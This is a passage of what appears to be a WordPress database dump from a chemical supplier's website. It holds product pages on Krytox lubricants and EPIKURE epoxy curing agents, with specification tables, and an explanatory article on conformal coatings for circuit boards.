href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/">Vacuum Pump Fluids</a></td>\r\n<td colspan="2">The Vacuum pump fluids are used in vacuum pumps and systems, and are used when controlled vapor pressure, nonflammability and non-reactivity are needed. These products can be regenerated back to original properties and reused.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>L<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/">ubricants for Extra High Temperature Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-s-series/">XHT- S, SX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with all elastomers and plastics. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-ac/">XHT- AC, ACX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with most elastomers and plastics. This grease contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-bd/">XHT- BD, BDX, BDZ</a></td>\r\n<td colspan="2">This grease is designed for use where the temperatures are in the 300 °C (572 °F) range and higher where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. The grease is slightly tacky and will coat the surface and stay in place. The oil in the grease can begin to slowly degrade at temperatures above 330 °C (625 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life. Maximum use temperatures for these greases are 360 °C (680 °F) with intermittent spikes to 400 °C (752 °F).</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Specialty Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-246/">GPL 246</a></td>\r\n<td>GPL 206 with copper added, so it will conduct electricity.</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-407/">GPL 407</a></td>\r\n<td colspan="2">A silica thickened non-melting thickener for low speed applications in conveyors and other such applications where temperatures might cause PTFE melting.</td>\r\n</tr>\r\n<tr>\r\n<td>GPL 577</td>\r\n<td colspan="2">A grease containing a special EP additive and anti-corrosion additives for use under high loads where corrosion might be a factor</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-lvp/">LVP</a></td>\r\n<td colspan="2">A special high vacuum grease for applications where outgassing must be avoided. This is used in high vacuum industries and for sealing joints in laboratory applications</td>\r\n</tr>\r\n<tr>\r\n<td>XP 2C5</td>\r\n<td colspan="2">The XP 2C5 grease contains an oil soluble additive that is effective at preventing corrosion and reducing wear. It also contains an extreme pressure additive. Typical applications include those in potentially corrosive atmospheres, where vibration or shock loading may be significant and where an element will spend more time experiencing mixed film or boundary lubrication versus the desired full film or hydrodynamic lubrication.</td>\r\n</tr>\r\n<tr>\r\n<td>XHT EP 298 and EP 299</td>\r\n<td colspan="2">These greases have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection. Typical applications include conveyor chains that are subjected to moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nTo learn more about food grade applications <a href="https://www.miller-stephenson.com/krytox-h-1-food-grade-lubricants/">click here.</a>\r\n\r\nFor Automotive solutions <a href="https://www.miller-stephenson.com/krytox-automotive-lubricants/">click here.</a>\r\n\r\nKrytox <a href="https://www.miller-stephenson.com/krytox-faq/">FAQ.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/mil-prf-27617-greases/">MIL PRF 27617 Greases</a>\r\n\r\n<strong>\r\nTO BROWSE OUR KRYTOX CATALOG, SELECT A CATEGORY BELOW:</strong>\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Lubricants, Greases and Oils"]\r\n\r\nKrytox™ is  a trademark of <a href="https://www.chemours.com/">The Chemours Company</a> FC, LLC.\r\n\r\n&nbsp;', 'Krytox Application Overview', '', 'inherit', 'closed', 'closed', '', '2050-revision-v1', '', '', '2016-11-16 15:37:20', '2016-11-16 15:37:20', '', 2050, 'https://www.miller-stephenson.com/2050-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3049, 56, '2016-11-16 15:45:34', '2016-11-16 15:45:34', '', '', '', 'publish', 'closed', 'closed', '', '3049', '', '', '2016-11-16 15:45:35', '2016-11-16 15:45:35', '', 0, 'https://www.miller-stephenson.com/nf_sub/3049/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3050, 0, '2016-11-16 17:29:40', '2016-11-16 17:29:40', '', '', '', 'publish', 'closed', 'closed', '', '3050', '', '', '2016-11-16 17:29:41', '2016-11-16 17:29:41', '', 0, 'https://www.miller-stephenson.com/nf_sub/3050/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3053, 172, '2016-11-17 00:55:43', '2016-11-17 00:55:43', '', '', '', 'publish', 'closed', 'closed', '', '3053', '', '', '2016-11-17 00:55:43', '2016-11-17 00:55:43', '', 0, 'https://www.miller-stephenson.com/nf_sub/3053/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3054, 0, '2016-11-17 13:00:16', '2016-11-17 13:00:16', '', '', '', 'publish', 'closed', 'closed', '', '3054', '', '', '2016-11-17 13:00:17', '2016-11-17 13:00:17', '', 0, 'https://www.miller-stephenson.com/nf_sub/3054/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3055, 2, '2016-11-17 15:22:21', '2016-11-17 15:22:21', '<h3>For URGENT requests, please call us at: 203-743-4447 (8-4 EST)</h3>\r\n&nbsp;\r\n<h4>Techincal Support Request Form:</h4>\r\n[ninja_form id=11]', 'Tech Support', '', 'inherit', 'closed', 'closed', '', '122-revision-v1', '', '', '2016-11-17 15:22:21', '2016-11-17 15:22:21', '', 122, 'https://www.miller-stephenson.com/122-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3056, 3, '2016-11-17 15:27:03', '2016-11-17 15:27:03', 'EPIKURE 3245 Epoxy Curing Agent as well as 3200, 3223, and 3234, are unmodified aliphatic amines. They are used in a variety of applications including epoxy curing agents. Due to their tendency to form complexes with atmospheric carbon dioxide, particularly in humid conditions, they are most often formulated, adducted or otherwise reacted to inhibit amine blush. As members of the ethylene amine family, they lend themselves to a wide variety of chemical reactions and enduse applications.\n\n<strong>Application Areas/Suggested Uses</strong>\n<ul>\n 	<li>\n<div class="Section1">Epoxy curing agents</div></li>\n 	<li>\n<div class="Section1">Polyamides for inks and adhesives</div></li>\n 	<li>\n<div class="Section1">Wet strength resins</div></li>\n 	<li>\n<div class="Section1">Corrosion inhibitors</div></li>\n 	<li>\n<div class="Section1">Oil and fuel additives</div></li>\n 	<li>\n<div class="Section1">Chelating agents</div></li>\n</ul>\n<strong>Specification</strong>\n<table style="height: 190px;" border="1" width="854" cellspacing="0" cellpadding="3">\n<tbody>\n<tr>\n<td valign="top" width="176">&nbsp;</td>\n<td valign="top" width="63">\n<p align="center"></p>\n</td>\n<td valign="top" width="75">\n<p align="center"><b>3200</b></p>\n<p align="center"><b>AEP</b></p>\n</td>\n<td valign="top" width="67">\n<p align="center"><b>3223</b></p>\n<p align="center"><b>DETA</b></p>\n</td>\n<td valign="top" width="75">\n<p align="center"><b>3234</b></p>\n<p align="center"><b>TETA</b></p>\n</td>\n<td valign="top" width="72">\n<p align="center"><b>3245</b></p>\n<p align="center"><b>TEPA</b></p>\n</td>\n<td valign="top" width="156">\n<p align="center"></p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="176"><strong>Property</strong></td>\n<td valign="top" width="63">\n<p align="center"><strong>Units</strong></p>\n</td>\n<td valign="top" width="75">\n<p align="center"><strong>Value</strong></p>\n</td>\n<td valign="top" width="67">\n<p align="center"><strong>Value</strong></p>\n</td>\n<td valign="top" width="75">\n<p align="center"><strong>Value</strong></p>\n</td>\n<td valign="top" width="72">\n<p align="center"><strong>Value</strong></p>\n</td>\n<td valign="top" width="156">\n<p align="center"><strong>Test Method/Standard</strong></p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="176"><strong>Amine value</strong></td>\n<td valign="top" width="63">\n<p align="center">mg/g</p>\n</td>\n<td valign="top" width="75">\n<p align="center">1,275 – 1,325</p>\n</td>\n<td valign="top" width="67">\n<p align="center">1,580 – 1,850</p>\n</td>\n<td valign="top" width="75">\n<p align="center">1,410 – 1,460</p>\n</td>\n<td valign="top" width="72">\n<p align="center">1,290 – 1,375</p>\n</td>\n<td valign="top" width="156">\n<p align="center">ASTM D2896</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="176"><strong>Color</strong></td>\n<td valign="top" width="63">\n<p align="center">Pt-Co</p>\n</td>\n<td valign="top" width="75">\n<p align="center"><span class="GramE">200 max.</span></p>\n</td>\n<td valign="top" width="67">\n<p align="center"><span class="GramE">30 max.</span></p>\n</td>\n<td valign="top" width="75">\n<p align="center"><span class="GramE">50 max.</span></p>\n</td>\n<td valign="top" width="72">\n<p align="center"></p>\n</td>\n<td valign="top" width="156">\n<p align="center">ASTM D1209</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="176"><strong>Color</strong></td>\n<td valign="top" width="63">\n<p align="center">Gardner</p>\n</td>\n<td valign="top" width="75">\n<p align="center"></p>\n</td>\n<td valign="top" width="67">\n<p align="center"></p>\n</td>\n<td valign="top" width="75">\n<p align="center"></p>\n</td>\n<td valign="top" width="72">\n<p align="center"><span class="GramE">2 max.</span></p>\n</td>\n<td valign="top" width="156">\n<p align="center">ASTM D1544</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="176"><strong>Water</strong></td>\n<td valign="top" width="63">\n<p align="center">% wt.</p>\n</td>\n<td valign="top" width="75">\n<p align="center"><span class="GramE">0.5 max.</span></p>\n</td>\n<td valign="top" width="67">\n<p align="center"><span class="GramE">0.5 max.</span></p>\n</td>\n<td valign="top" width="75">\n<p align="center"><span class="GramE">0.5 max.</span></p>\n</td>\n<td valign="top" width="72">\n<p align="center"><span class="GramE">0.5 max.</span></p>\n</td>\n<td valign="top" width="156">\n<p align="center">ASTM E1064</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="176"><strong>Purity</strong></td>\n<td valign="top" width="63">\n<p align="center">% wt.</p>\n</td>\n<td valign="top" width="75">\n<p align="center">98.0</p>\n</td>\n<td valign="top" width="67">\n<p align="center">98.5</p>\n</td>\n<td valign="top" width="75">\n<p align="center">96.0</p>\n</td>\n<td valign="top" width="72">\n<p align="center">95.0</p>\n</td>\n<td valign="top" width="156">\n<p align="center"></p>\n</td>\n</tr>\n</tbody>\n</table>\n<strong>Typical Properties</strong>\n<table style="height: 342px;" border="1" width="858" cellspacing="0" cellpadding="3">\n<tbody>\n<tr>\n<td valign="top" width="180">&nbsp;</td>\n<td valign="top" width="60">\n<p align="center"></p>\n</td>\n<td valign="top" width="72">\n<p align="center"><b>3200</b></p>\n<p align="center"><b>AEP</b></p>\n</td>\n<td valign="top" width="72">\n<p align="center"><b>3223</b></p>\n<p align="center"><b>DETA</b></p>\n</td>\n<td valign="top" width="72">\n<p align="center"><b>3234</b></p>\n<p align="center"><b>TETA</b></p>\n</td>\n<td valign="top" width="72">\n<p align="center"><b>3245</b></p>\n<p align="center"><b>TEPA</b></p>\n</td>\n<td valign="top" width="156">\n<p align="center"></p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="180">Property</td>\n<td valign="top" width="60">\n<p align="center">Units</p>\n</td>\n<td valign="top" width="72">\n<p align="center">Value</p>\n</td>\n<td valign="top" width="72">\n<p align="center">Value</p>\n</td>\n<td valign="top" width="72">\n<p align="center">Value</p>\n</td>\n<td valign="top" width="72">\n<p align="center">Value</p>\n</td>\n<td valign="top" width="156">\n<p align="center">Test Method/Standard</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="180">Viscosity at 20°C</td>\n<td valign="top" width="60">\n<p align="center">cP</p>\n</td>\n<td valign="top" width="72">\n<p align="center">20</p>\n</td>\n<td valign="top" width="72">\n<p align="center">10</p>\n</td>\n<td valign="top" width="72">\n<p align="center">25</p>\n</td>\n<td valign="top" width="72">\n<p align="center">100</p>\n</td>\n<td valign="top" width="156">\n<p align="center"></p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="180">Equivalent weight, approx.</td>\n<td valign="top" width="60">\n<p align="center"></p>\n</td>\n<td valign="top" width="72">\n<p align="center">43</p>\n</td>\n<td valign="top" width="72">\n<p align="center">20.7</p>\n</td>\n<td valign="top" width="72">\n<p align="center">24.5</p>\n</td>\n<td valign="top" width="72">\n<p align="center">27.2</p>\n</td>\n<td valign="top" width="156">\n<p align="center"></p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="180">Density @ 20 °C</td>\n<td valign="top" width="60">\n<p align="center">g/ml</p>\n</td>\n<td valign="top" width="72">\n<p align="center">0.98</p>\n</td>\n<td valign="top" width="72">\n<p align="center">0.95</p>\n</td>\n<td valign="top" width="72">\n<p align="center">0.98</p>\n</td>\n<td valign="top" width="72">\n<p align="center">0.99</p>\n</td>\n<td valign="top" width="156">\n<p align="center"></p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="180">Boiling Point, 760 mm Hg</td>\n<td valign="top" width="60">\n<p align="center">°C</p>\n</td>\n<td valign="top" width="72">\n<p align="center">222</p>\n</td>\n<td valign="top" width="72">\n<p align="center">207</p>\n</td>\n<td valign="top" width="72">\n<p align="center">227</p>\n</td>\n<td valign="top" width="72">\n<p align="center">Decomp.</p>\n</td>\n<td valign="top" width="156">\n<p align="center"></p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="180">Flash Point</td>\n<td valign="top" width="60">\n<p align="center">°C</p>\n</td>\n<td valign="top" width="72">\n<p align="center">215</p>\n</td>\n<td valign="top" width="72">\n<p align="center">210</p>\n</td>\n<td valign="top" width="72">\n<p align="center">275</p>\n</td>\n<td valign="top" width="72">\n<p align="center">280</p>\n</td>\n<td valign="top" width="156">\n<p align="center">ASTM D56</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="180">Mix Ratio, EEW 190 epoxy</td>\n<td valign="top" width="60">\n<p align="center">phr</p>\n</td>\n<td valign="top" width="72">\n<p align="center">22.7</p>\n</td>\n<td valign="top" width="72">\n<p align="center">10.9</p>\n</td>\n<td valign="top" width="72">\n<p align="center">12.9</p>\n</td>\n<td valign="top" width="72">\n<p align="center">14.3</p>\n</td>\n<td valign="top" width="156">\n<p align="center"></p>\n</td>\n</tr>\n</tbody>\n</table>\n&nbsp;\n\nStorage:\n\nTo preserve Epikure 3245 product quality and prevent discoloration, it is recommended that a nitrogen blanket be maintained on the headspace of an opened container and that storage / handling temperatures in excess of 50°C (122°F) be avoided. Spillage around the opening of the container from dispensing operations will form a crystalline residue. This residue is not soluble in the curing agent <span class="GramE">nor</span> the resin, and certain measures should be taken to prevent it from contaminating the remaining contents of the container. The crystalline residue should be removed with a warm damp wash cloth PRIOR to re-opening the container for dispensing.', 'EPIKURE™ 3245', 'EPIKURE™ Curing Agents 3200, 3223, 3234, and 3245 are unmodified aliphatic amines. They are used in a variety of applications including epoxy curing agents. Due to their tendency to form complexes with atmospheric carbon dioxide, particularly in humid conditions, they are most often formulated, adducted or otherwise reacted to inhibit amine blush. Application Include:\n<ul>\n 	<li>Epoxy curing agents</li>\n 	<li>Polyamides for inks and adhesives</li>\n 	<li>Wet strength resins</li>\n 	<li>Corrosion inhibitors</li>\n 	<li>Oil and fuel additives</li>\n 	<li>Chelating agents</li>\n</ul>', 'inherit', 'closed', 'closed', '', '1187-autosave-v1', '', '', '2016-11-17 15:27:03', '2016-11-17 15:27:03', '', 1187, 'https://www.miller-stephenson.com/1187-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3057, 3, '2016-11-17 16:21:12', '2016-11-17 16:21:12', '<p class="Section1">EPIKURE 3282, a very reactive modified aliphatic amine adduct, has been developed for applications where relatively short cure periods at room temperature are required.</p>\n<p class="Section1"> <strong>Application Areas/Suggested Uses</strong></p>\n\n<div class="Section1">\n<ul>\n 	<li>Tooling gel coats</li>\n 	<li>Laminating compounds</li>\n 	<li>Adhesives</li>\n</ul>\n</div>\nCompositions based on <strong><a href="https://www.miller-stephenson.com/product/epon-828/">EPON™ Resin 828</a></strong> and EPIKURE 3282 cure readily at room temperature. The pot life of such compositions is highly dependent on the volume of the mixture, temperature, amount and type of filler loading, and, to a lesser extent, the presence of a reactive diluent. An indication of the reactivity of several unfilled systems under varying conditions is presented in Table 1.\n\nEPIKURE Curing Agent 3282 is normally used at a weight ratio of 20 parts per 100 parts of liquid epoxy resin. Thin sections, where exothermic heat is readily dissipated, require 4 to 8 hours for the composition to cure to handling strength. The composition reaches full cure after 4 to 7 days. Thin sections may be cured rapidly at moderately elevated temperatures, but thick sections should be allowed to exotherm before heat is applied. The maximum thickness recommended for an unfilled composition is approximately 1/2 inch. Maximum high temperature properties are obtained with a post cure of about 2 hours at 93 to 121 °C.\n<table border="0" cellspacing="0" cellpadding="0">\n<tbody>\n<tr>\n<td valign="top" width="600">Table 1 / <strong>Reactivity of compositions containing EPIKURE™ Curing Agent 3282</strong></td>\n</tr>\n</tbody>\n</table>\n&nbsp;\n<table style="height: 149px;" border="0" width="886" cellspacing="0" cellpadding="0">\n<tbody>\n<tr>\n<td valign="top" width="192">&nbsp;</td>\n<td valign="top" width="60">\n<p align="center"><u><strong>Units</strong></u></p>\n</td>\n<td valign="top" width="156">\n<p align="center"><u><strong>A</strong></u></p>\n</td>\n<td valign="top" width="156">\n<p align="center"><u><strong>B</strong></u></p>\n</td>\n<td valign="top" width="156">\n<p align="center"><u><strong>C</strong></u></p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="192"><strong><a href="https://www.miller-stephenson.com/product/epon-828/">EPON™ Resin 828</a></strong></td>\n<td valign="top" width="60">\n<p align="center">pbw</p>\n</td>\n<td valign="top" width="156">\n<p align="center">100</p>\n</td>\n<td valign="top" width="156">\n<p align="center">---</p>\n</td>\n<td valign="top" width="156">\n<p align="center">80</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="192">EPON Resin 815</td>\n<td valign="top" width="60">\n<p align="center">pbw</p>\n</td>\n<td valign="top" width="156">\n<p align="center">---</p>\n</td>\n<td valign="top" width="156">\n<p align="center">100</p>\n</td>\n<td valign="top" width="156">\n<p align="center">---</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="192">HELOXY™ Modifier 61</td>\n<td valign="top" width="60">\n<p align="center">pbw</p>\n</td>\n<td valign="top" width="156">\n<p align="center">---</p>\n</td>\n<td valign="top" width="156">\n<p align="center">---</p>\n</td>\n<td valign="top" width="156">\n<p align="center">20</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="192">EPIKURE 3282</td>\n<td valign="top" width="60">\n<p align="center">pbw</p>\n</td>\n<td valign="top" width="156">\n<p align="center">20</p>\n</td>\n<td valign="top" width="156">\n<p align="center">20</p>\n</td>\n<td valign="top" width="156">\n<p align="center">20</p>\n</td>\n</tr>\n</tbody>\n</table>\n&nbsp;\n\nHandling Properties:\n<table style="height: 309px;" border="0" width="884" cellspacing="0" cellpadding="0">\n<tbody>\n<tr>\n<td valign="top" width="119">\n<p align="center"></p>\n<p align="center">Weight,</p>\n</td>\n<td valign="top" width="132">\n<p align="center"></p>\n<p align="center">Thickness,</p>\n</td>\n<td valign="top" width="60">\n<p align="center">Gel Time,</p>\n</td>\n<td colspan="2" valign="top" width="96">\n<p align="center">Maximum Exotherm,</p>\n</td>\n<td valign="top" width="57">\n<p align="center">Gel Time,</p>\n</td>\n<td colspan="2" valign="top" width="99">\n<p align="center">Maximum Exotherm,</p>\n</td>\n<td valign="top" width="57">\n<p align="center">Gel Time,</p>\n</td>\n<td colspan="2" valign="top" width="99">\n<p align="center">Maximum Exotherm,</p>\n</td>\n</tr>\n<tr>\n<td colspan="2" valign="top" width="125">\n<p align="center"><u>grams</u></p>\n</td>\n<td valign="top" width="132">\n<p align="center"><u>inch</u></p>\n</td>\n<td valign="top" width="60">\n<p align="center"><u>min.</u></p>\n</td>\n<td valign="top" width="48">\n<p align="center"><u>°F</u></p>\n</td>\n<td valign="top" width="48">\n<p align="center"><u>°C</u></p>\n</td>\n<td valign="top" width="57">\n<p align="center"><u>min.</u></p>\n</td>\n<td valign="top" width="51">\n<p align="center"><u>°F</u></p>\n</td>\n<td valign="top" width="48">\n<p align="center"><u>°C</u></p>\n</td>\n<td valign="top" width="57">\n<p align="center"><u>min.</u></p>\n</td>\n<td valign="top" width="51">\n<p align="center"><u>°F</u></p>\n</td>\n<td valign="top" width="48">\n<p align="center"><u>°C</u></p>\n</td>\n</tr>\n<tr>\n<td colspan="2" valign="top" width="125">\n<p align="center">100</p>\n</td>\n<td valign="top" width="132">\n<p align="center">2</p>\n</td>\n<td valign="top" width="60">\n<p align="center">15</p>\n</td>\n<td valign="top" width="48">\n<p align="center">400</p>\n</td>\n<td valign="top" width="48">\n<p align="center">204</p>\n</td>\n<td valign="top" width="57">\n<p align="center">16</p>\n</td>\n<td valign="top" width="51">\n<p align="center">385</p>\n</td>\n<td valign="top" width="48">\n<p align="center">196</p>\n</td>\n<td valign="top" width="57">\n<p align="center">17</p>\n</td>\n<td valign="top" width="51">\n<p align="center">375</p>\n</td>\n<td valign="top" width="48">\n<p align="center">191</p>\n</td>\n</tr>\n<tr>\n<td colspan="2" valign="top" width="125">\n<p align="center">50</p>\n</td>\n<td valign="top" width="132">\n<p align="center">1</p>\n</td>\n<td valign="top" width="60">\n<p align="center">16</p>\n</td>\n<td valign="top" width="48">\n<p align="center">350</p>\n</td>\n<td valign="top" width="48">\n<p align="center">177</p>\n</td>\n<td valign="top" width="57">\n<p align="center">18</p>\n</td>\n<td valign="top" width="51">\n<p align="center">315</p>\n</td>\n<td valign="top" width="48">\n<p align="center">157</p>\n</td>\n<td valign="top" width="57">\n<p align="center">24</p>\n</td>\n<td valign="top" width="51">\n<p align="center">300</p>\n</td>\n<td valign="top" width="48">\n<p align="center">149</p>\n</td>\n</tr>\n<tr>\n<td colspan="2" valign="top" width="125">\n<p align="center">25</p>\n</td>\n<td valign="top" width="132">\n<p align="center">1</p>\n</td>\n<td valign="top" width="60">\n<p align="center">19</p>\n</td>\n<td valign="top" width="48">\n<p align="center">320</p>\n</td>\n<td valign="top" width="48">\n<p align="center">160</p>\n</td>\n<td valign="top" width="57">\n<p align="center">22</p>\n</td>\n<td valign="top" width="51">\n<p align="center">270</p>\n</td>\n<td valign="top" width="48">\n<p align="center">132</p>\n</td>\n<td valign="top" width="57">\n<p align="center">31</p>\n</td>\n<td valign="top" width="51">\n<p align="center">225</p>\n</td>\n<td valign="top" width="48">\n<p align="center">107</p>\n</td>\n</tr>\n<tr>\n<td colspan="2" valign="top" width="125">\n<p align="center">10</p>\n</td>\n<td valign="top" width="132">\n<p align="center">3/16</p>\n</td>\n<td valign="top" width="60">\n<p align="center">90</p>\n</td>\n<td valign="top" width="48">\n<p align="center">93</p>\n</td>\n<td valign="top" width="48">\n<p align="center">34</p>\n</td>\n<td valign="top" width="57">\n<p align="center">120</p>\n</td>\n<td valign="top" width="51">\n<p align="center">77*</p>\n</td>\n<td valign="top" width="48">\n<p align="center">25*</p>\n</td>\n<td valign="top" width="57">\n<p align="center">150</p>\n</td>\n<td valign="top" width="51">\n<p align="center">77*</p>\n</td>\n<td valign="top" width="48">\n<p align="center">25*</p>\n</td>\n</tr>\n</tbody>\n</table>\n&nbsp;\n\nMiller-Stephenson is an Epon, Epikure Curing Agent, Eponex, and Heloxy Supplier and certified from Hexion for direct distribution, technical support, and formulation modifications. <a href="https://www.miller-stephenson.com/tech-support/">For Technical Service Question please click here</a>', 'EPIKURE™ 3282', 'EPIKURE™ Curing Agent 3282, a very reactive modified aliphatic amine adduct, has been developed for applications where relatively short cure periods at room temperature are required. EPIKURE Curing Agent 3282 is normally used at a weight ratio of 20 parts per 100 parts of liquid epoxym resin. Thin sections, where exothermic heat is readily dissipated, require 4 to 8 hours for the composition to cure to handling strength. The composition reaches full cure after 4 to 7 days.', 'inherit', 'closed', 'closed', '', '1193-autosave-v1', '', '', '2016-11-17 16:21:12', '2016-11-17 16:21:12', '', 1193, 'https://www.miller-stephenson.com/1193-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3058, 174, '2016-11-17 17:10:51', '2016-11-17 17:10:51', '', '', '', 'publish', 'closed', 'closed', '', '3058', '', '', '2016-11-17 17:10:51', '2016-11-17 17:10:51', '', 0, 'https://www.miller-stephenson.com/nf_sub/3058/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3059, 175, '2016-11-17 18:50:55', '2016-11-17 18:50:55', '', '', '', 'publish', 'closed', 'closed', '', '3059', '', '', '2016-11-17 18:50:56', '2016-11-17 18:50:56', '', 0, 'https://www.miller-stephenson.com/nf_sub/3059/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3060, 2, '2016-11-17 20:22:31', '2016-11-17 20:22:31', 'Conformal coatings are specialized film forming polymers that protect circuit boards and other electronic components from adverse environmental conditions and mechanical abrasion. These coatings ‘conform’ to the irregular topography of a electronic circuit board, providing increased dielectric resistance, operational and structural integrity, and protection from corrosive elements, moisture, heat, fungus, and airborne contaminants such as dirt and dust. With continued miniaturization of electronics, the necessity of conformal coating has increased because necessity for an additional insulative coating layer between circuits to prevent arcing or current bleed.\r\n\r\nConformal coatings are also “breathable”, allowing trapped moisture in electronic boards to escape while maintaining protection from environmental contaminates. However these coatings are not sealants, and prolonged exposure to vapors will cause transmission and degradation to occur. There are typically four classes of conformal coatings: Acrylic, Urethane, Silicone, and Varnish. While each has its own specific physical and chemical properties each are able to perform the following functions:\r\n<ul>\r\n 	<li>Insulation: Allowing reduction in conductor spacing</li>\r\n 	<li>Eliminate the need for complex, sophisticated enclosures</li>\r\n 	<li>Minimal effect on component weight</li>\r\n 	<li>Completely protect the assembly against chemical and corrosive attack</li>\r\n 	<li>Eliminate potential performance degradation due to environmental hazards</li>\r\n 	<li>Minimize environmental stress on a PCB assembly</li>\r\n</ul>\r\nAs mentioned there are four general classes of conformal coating to choose from:\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/acrylic-conformal-coating/"><strong>ACRYLIC:</strong></a> Acrylic conformal coatings provide fair elasticity and general protection. As one‐part systems, they are easy to apply, remove, and re-work. Acrylic conformal coatings are recognized for their high dielectric strength, abrasion resistance and ease of removal.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/silicone-confromal-coating/"><strong>SILICONE:</strong></a> Silicone conformal coatings provide excellent protection in a very wide temperature range, have high dielectric strength, and low excellent self-leveling properties. They provide good chemical resistance, UV resistance, salt spray resistance and are very flexible. This is the coating least compatible with all of the other coating types.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/urethane-conformal-coating/"><strong>URETHANE:</strong></a> Polyurethane conformal coatings are known for their excellent moisture and chemical resistance and good dielectric properties. They are also very abrasion resistant. Urethanes typically require specialized stripping solvents like MS-114 Conformal Coating Stripper.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/product/ms-252n/"><strong>VARNISH:</strong></a> Varnish conformal coatings are natural‐based resins that form tough coatings which are moisture resistant materials that lack the flexibility of the above materials, and also have greater variations in insulative properties and stability.</li>\r\n</ul>\r\nEqually as important as choosing the correct resin is proper application and cure of the conformal coating.  To be effective, a conformal coating should completely cover the assembly and provide good coverage of sharp edges (components and component leads) and other contours (solder joints, etc). It may even be essential to coat the edge to generate a ubiquitous layer throughout the entire board or device\r\n\r\n<img class="alignleft wp-image-2477" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Coating_-_ge_033.tif.jpg" alt="conformal coating" width="343" height="343" />\r\n\r\nThe effectiveness of the coating is influenced by the efficiency of the application method, which also governs the type of coating used.  Typically coating thickness of 1-2 mil is recommended to ensure coating robustness, uniform coverage, and long-term stability. Thicker coatings can be applied however dielectric properties of the coating may be effected. There are the three main ways of applying a conformal coating:\r\n<ol>\r\n 	<li>Dipping – limited to materials that do not cure quickly by moisture, oxidation or light</li>\r\n 	<li>Selective robotic coating – such as Asymtek. All coating types can be used if the correct dispense head is selected</li>\r\n 	<li>Spraying – hand spray using a spray booth or aerosol can. All coatings can be applied in this way</li>\r\n</ol>\r\nThe liquid coating application should thoroughly wet all surfaces and cure without leaving surface defects. Defects typically observed are hazy or cloudiness, air bubbles, irregular levelling (known as orange peel), or voids.  These defects can have substantial effects on the final performance of the coating and one should consider re-working the PCB. Cleanliness of the substrate is of extreme importance for the successful application of a conformal coating. Surfaces must be free of moisture, dirt, wax, grease, flux residues and 